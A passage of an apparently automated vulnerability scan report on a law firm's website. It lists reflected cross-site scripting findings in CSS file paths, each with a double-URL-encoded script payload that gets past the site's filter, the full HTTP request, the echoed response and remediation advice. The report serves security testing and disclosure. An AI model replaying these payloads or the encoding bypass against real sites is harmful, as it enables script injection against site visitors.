Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.all.cssc332a"><script>alert(1)</script>b48dfbd1665" value="">
...[SNIP]...

4.161. http://www.wileyrein.com/css/ui/ui.base.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.base.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aa04%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f73509fbde was submitted in the REST URL parameter 1. This input was echoed as 9aa04"><script>alert(1)</script>3f73509fbde in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css9aa04%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f73509fbde/ui/ui.base.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css9aa04"><script>alert(1)</script>3f73509fbde/ui/ui.base.css" value="">
...[SNIP]...

4.162. http://www.wileyrein.com/css/ui/ui.base.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.base.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a32e5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb7ea1967ea4 was submitted in the REST URL parameter 2. This input was echoed as a32e5"><script>alert(1)</script>b7ea1967ea4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/uia32e5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb7ea1967ea4/ui.base.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/uia32e5"><script>alert(1)</script>b7ea1967ea4/ui.base.css" value="">
...[SNIP]...

4.163. http://www.wileyrein.com/css/ui/ui.base.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.base.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4008%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e674bcd1bc31 was submitted in the REST URL parameter 3. This input was echoed as a4008"><script>alert(1)</script>674bcd1bc31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.base.cssa4008%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e674bcd1bc31 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.base.cssa4008"><script>alert(1)</script>674bcd1bc31" value="">
...[SNIP]...

4.164. http://www.wileyrein.com/css/ui/ui.core.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.core.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfd19%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32dc5bc06f was submitted in the REST URL parameter 1. This input was echoed as cfd19"><script>alert(1)</script>32dc5bc06f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /csscfd19%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32dc5bc06f/ui/ui.core.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/csscfd19"><script>alert(1)</script>32dc5bc06f/ui/ui.core.css" value="">
...[SNIP]...

4.165. http://www.wileyrein.com/css/ui/ui.core.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.core.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cac63%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5d010f954eb was submitted in the REST URL parameter 2. This input was echoed as cac63"><script>alert(1)</script>5d010f954eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/uicac63%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5d010f954eb/ui.core.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/uicac63"><script>alert(1)</script>5d010f954eb/ui.core.css" value="">
...[SNIP]...

4.166. http://www.wileyrein.com/css/ui/ui.core.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.core.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6878%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49980770f59 was submitted in the REST URL parameter 3. This input was echoed as c6878"><script>alert(1)</script>49980770f59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.core.cssc6878%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49980770f59 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.core.cssc6878"><script>alert(1)</script>49980770f59" value="">
...[SNIP]...

4.167. http://www.wileyrein.com/css/ui/ui.datepicker.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.datepicker.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbf73%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef798e920d23 was submitted in the REST URL parameter 1. This input was echoed as fbf73"><script>alert(1)</script>f798e920d23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cssfbf73%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef798e920d23/ui/ui.datepicker.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/cssfbf73"><script>alert(1)</script>f798e920d23/ui/ui.datepicker.css" value="">
...[SNIP]...

4.168. http://www.wileyrein.com/css/ui/ui.datepicker.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.datepicker.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6749%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e54913b0be8b was submitted in the REST URL parameter 2. This input was echoed as b6749"><script>alert(1)</script>54913b0be8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/uib6749%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e54913b0be8b/ui.datepicker.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/uib6749"><script>alert(1)</script>54913b0be8b/ui.datepicker.css" value="">
...[SNIP]...

4.169. http://www.wileyrein.com/css/ui/ui.datepicker.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.datepicker.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45672%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f4fe8f9220 was submitted in the REST URL parameter 3. This input was echoed as 45672"><script>alert(1)</script>4f4fe8f9220 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.datepicker.css45672%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f4fe8f9220 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.datepicker.css45672"><script>alert(1)</script>4f4fe8f9220" value="">
...[SNIP]...

4.170. http://www.wileyrein.com/css/ui/ui.dialog.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.dialog.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36a08%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecbd401dfa0f was submitted in the REST URL parameter 1. This input was echoed as 36a08"><script>alert(1)</script>cbd401dfa0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css36a08%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecbd401dfa0f/ui/ui.dialog.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css36a08"><script>alert(1)</script>cbd401dfa0f/ui/ui.dialog.css" value="">
...[SNIP]...

4.171. http://www.wileyrein.com/css/ui/ui.dialog.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.dialog.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c042%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee88d9eeae49 was submitted in the REST URL parameter 2. This input was echoed as 8c042"><script>alert(1)</script>e88d9eeae49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui8c042%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee88d9eeae49/ui.dialog.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui8c042"><script>alert(1)</script>e88d9eeae49/ui.dialog.css" value="">
...[SNIP]...

4.172. http://www.wileyrein.com/css/ui/ui.dialog.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.dialog.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf81b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed17f52d89 was submitted in the REST URL parameter 3. This input was echoed as bf81b"><script>alert(1)</script>ed17f52d89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.dialog.cssbf81b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed17f52d89 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.dialog.cssbf81b"><script>alert(1)</script>ed17f52d89" value="">
...[SNIP]...

4.173. http://www.wileyrein.com/css/ui/ui.progressbar.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.progressbar.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cb17%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee53ecb908c0 was submitted in the REST URL parameter 1. This input was echoed as 5cb17"><script>alert(1)</script>e53ecb908c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css5cb17%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee53ecb908c0/ui/ui.progressbar.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css5cb17"><script>alert(1)</script>e53ecb908c0/ui/ui.progressbar.css" value="">
...[SNIP]...

4.174. http://www.wileyrein.com/css/ui/ui.progressbar.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.progressbar.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 612ba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8b00486b426 was submitted in the REST URL parameter 2. This input was echoed as 612ba"><script>alert(1)</script>8b00486b426 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui612ba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8b00486b426/ui.progressbar.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


